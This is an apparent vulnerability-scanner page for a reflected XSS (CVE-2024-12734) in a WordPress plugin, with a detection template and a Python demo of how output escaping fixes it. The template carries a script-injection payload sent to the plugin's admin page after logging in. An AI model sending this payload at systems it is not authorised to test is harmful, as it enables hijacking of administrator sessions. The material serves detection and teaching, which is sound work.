Advance Post Prefix WordPress plugin - Reflected XSS
CVE-2024-12734
Verified
Description
Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting vulnerability caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high-privilege users such as admin; exploitation requires a crafted request.
Severity
Medium
CVSS Score
6.1
Exploit Probability
0%
Affected Product
advance_post_prefix
Published Date
February 5, 2026
Template Author
sourabh-sahu
CVE-2024-12734.yaml
id: CVE-2024-12734

info:
  name: Advance Post Prefix WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting vulnerability caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high-privilege users such as admin; exploitation requires a crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version of Advance Post Prefix WordPress plugin.
  reference:
    - https://wpscan.com/vulnerability/038b44dc-0495-4f56-ae7e-c78a265aa535/
    - https://nvd.nist.gov/vuln/detail/cve-2024-12734
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12734
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41725
    cpe: cpe:2.3:a:niceit:advance_post_prefix:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: niceit
    product: advance_post_prefix
  tags: cve,cve2024,niceit,advance-post-prefix,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=add-prefix&post="></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","advance-post-prefix")
        condition: and
# digest: 4b0a00483046022100f8f5be84695a9407cacecaafd28b99aac08148e5cc55230b311f7233762c6c7c0221008e8a076440212ef7f6ae93a61b9c3feb16f933f7c4d5bb5f5cfea67254039800:922c64590222798bb761d5b6d8e72950
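The template's second matcher only fires when the `post` parameter comes back in the page body byte-for-byte, which is exactly what output escaping prevents. The following is an added example (not the plugin's code and not part of the template): a hypothetical stand-in for the `page=add-prefix` admin page rendered once without escaping and once with HTML attribute escaping equivalent to WordPress's `esc_attr()`, with the template's matcher logic applied to both responses. The `<input>` markup is a constructed illustration, not taken from the plugin.

```python
import html
from dataclasses import dataclass

# Reflected payload and page marker, copied from the template's second request and matcher.
PAYLOAD = '"></script><script>alert(document.domain)</script><script>`'
MARKER = "advance-post-prefix"


@dataclass
class Response:
    status_code: int
    body: str


def render_add_prefix_page(post: str, escape_output: bool) -> Response:
    """Hypothetical stand-in for the plugin's admin page (assumption, not the real code).

    escape_output=False writes the `post` query parameter straight into an attribute
    value, the unsanitized/unescaped output the CVE describes.
    escape_output=True escapes it the way esc_attr() does (", <, > become entities),
    which is the fix the remediation note implies.
    """
    value = html.escape(post, quote=True) if escape_output else post
    body = (
        '<div class="wrap advance-post-prefix">\n'
        f'<input type="text" name="post" value="{value}">\n'
        "</div>"
    )
    return Response(200, body)


def template_matches(resp: Response) -> bool:
    """Same logic as the template's second matcher:
    status_code == 200 && contains_all(body, PAYLOAD, MARKER)."""
    return resp.status_code == 200 and all(s in resp.body for s in (PAYLOAD, MARKER))


def demo() -> tuple:
    """Returns (matcher result on the unescaped page, matcher result on the escaped page)."""
    vulnerable = template_matches(render_add_prefix_page(PAYLOAD, escape_output=False))
    fixed = template_matches(render_add_prefix_page(PAYLOAD, escape_output=True))
    return vulnerable, fixed


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The escaped response still contains the marker string, so a patched install is distinguished only by the payload no longer appearing verbatim, which is why the matcher requires both substrings.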
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2024-12734
CWE ID:
CWE-79
Remediation Steps
Update to the latest version of Advance Post Prefix WordPress plugin.